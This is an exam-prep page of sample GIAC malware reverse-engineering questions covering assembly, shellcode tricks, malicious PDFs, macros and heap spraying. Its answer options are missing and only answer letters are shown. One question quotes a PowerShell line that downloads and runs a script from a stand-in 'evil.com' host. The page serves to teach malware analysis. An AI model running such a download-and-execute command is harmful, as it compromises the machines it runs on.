GREM Sample Questions

GREM Sample Questions & Answers

Free GIAC Reverse Engineering Malware practice questions with worked answers and explanations. See how the ExamJungle simulator prepares you — then jump into the full test.

Launch the full GREM simulator →

Showing 10 of 20 free samples.

  1. Question 1Advanced

    Windows Assembly Code and Reverse Engineering · x86/x64 Assembly Fundamentals

    You are analyzing a function call in a 32-bit Windows malware sample. You see the following instructions:

    PUSH 0
    PUSH 0
    PUSH 0
    PUSH 0
    PUSH OFFSET Command
    PUSH 0
    CALL Kernel32.CreateProcessA
    

    If the malware were compiled for a 64-bit Windows environment, how would the first four parameters be passed to CreateProcessA according to the Microsoft x64 calling convention?

    Show answer & explanation

    Correct answer: A

    The Microsoft x64 calling convention (fastcall) requires the first four integer or pointer arguments to be passed in registers RCX, RDX, R8, and R9 respectively. Any additional arguments are pushed onto the stack.

  2. Question 2Beginner

    Windows Assembly Code and Reverse Engineering · Control Flow Analysis

    You encounter a routine that iterates through a byte array, performing an XOR operation on each byte with the key 0x5A. What is the primary purpose of this routine in the context of malware analysis?

    Show answer & explanation

    Correct answer: B

    Single-byte XOR encoding is a very common and simple obfuscation technique used by malware to hide strings (like C2 URLs) and payloads from static string analysis tools.

  3. Question 3Intermediate

    Windows Assembly Code and Reverse Engineering · Control Flow Analysis

    In x86 assembly, the TEST instruction is frequently used before a conditional jump. If you see TEST EAX, EAX followed by JZ (Jump if Zero), what is the code checking?

    Show answer & explanation

    Correct answer: C

    TEST EAX, EAX performs a bitwise AND operation but discards the result, only setting flags. If EAX is zero, the Zero Flag (ZF) is set to 1. The JZ instruction then jumps if ZF is 1. Essentially, it checks if the register is empty/null/zero.

  4. Question 4Intermediate

    Windows Assembly Code and Reverse Engineering · Control Flow Analysis

    Which of the following assembly instructions is commonly used in shellcode to calculate the current instruction pointer (EIP) location dynamically, often referred to as 'get_pc' or 'get_eip' technique?

    Show answer & explanation

    Correct answer: D

    Since EIP cannot be accessed directly in x86 (e.g., MOV EAX, EIP is invalid), shellcode often uses a CALL to the next instruction (or a near offset). The CALL pushes the return address (the current IP) onto the stack. The subsequent POP instruction then retrieves that address into a register.

  5. Question 5Beginner

    Windows Assembly Code and Reverse Engineering · Windows API Analysis

    You are reverse engineering a downloader that uses URLDownloadToFileW. The second parameter is the URL. In the disassembly, you see PUSH EAX before the call, where EAX points to a wide string. What character encoding must this string use?

    Show answer & explanation

    Correct answer: A

    Windows API functions ending in 'W' (e.g., URLDownloadToFileW) expect Wide strings, which in Windows are encoded as UTF-16 Little Endian (2 bytes per character). Functions ending in 'A' expect ASCII/ANSI strings.

  6. Question 6Intermediate

    Analyzing Malicious Documents and Scripts · PDF Malware Analysis

    You are inspecting a malicious PDF document using pdf-parser.py. You locate an object with /Type /Action and /S /JavaScript. However, the script content inside the stream appears to be random alphanumeric characters. What filter should you check for in the object definition to correctly decode this stream?

    Show answer & explanation

    Correct answer: B

    PDF streams are often compressed to save space or obfuscate content. /FlateDecode indicates zlib compression. You must decompress this stream (e.g., using pdf-parser -f) to view the actual JavaScript code.

  7. Question 7Beginner

    Analyzing Malicious Documents and Scripts · Office Macro Malware

    Which of the following VBA events is most commonly used by malicious Word documents to automatically execute code when the document is opened?

    Show answer & explanation

    Correct answer: A

    Document_Open() (and similarly AutoOpen()) is the standard event handler in VBA that triggers automatically when a Word document is opened. Malware authors rely on this to execute their payload without further user interaction beyond enabling macros.

  8. Question 8Intermediate

    Analyzing Malicious Documents and Scripts · Script-Based Malware

    You are analyzing a suspicious PowerShell script. You see the command IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1'). What is the function of IEX in this context?

    Show answer & explanation

    Correct answer: B

    IEX is an alias for Invoke-Expression. It takes a string and executes it as code within the current PowerShell scope. This is a common technique for 'fileless' malware, as the downloaded payload runs directly in RAM without hitting the disk.

  9. Question 9Advanced

    Analyzing Malicious Documents and Scripts · Malicious RTF Analysis

    A malicious RTF document uses the CVE-2017-11882 vulnerability. This exploit typically targets which component to achieve code execution?

    Show answer & explanation

    Correct answer: B

    CVE-2017-11882 is a classic stack buffer overflow in the Microsoft Equation Editor (EQNEDT32.EXE), an older component often embedded in RTF/Word documents via OLE objects.

  10. Question 10Intermediate

    Analyzing Malicious Documents and Scripts · PDF Malware Analysis

    When analyzing a malicious JavaScript file from a PDF, you observe a large loop repeating a string containing NOP sleds and shellcode. This technique, designed to manipulate memory allocation to position shellcode at a predictable address, is known as:

    Show answer & explanation

    Correct answer: C

    Heap spraying involves allocating large blocks of memory containing a NOP sled and shellcode. The goal is to fill the heap so that a jump to a random or specific high memory address (like 0x0c0c0c0c) will land in the NOP sled and slide into the shellcode.

Ready for the real thing?

The full GREM simulator has every exam-style question, timed mode, and instant scoring.

Go to the GREM simulator →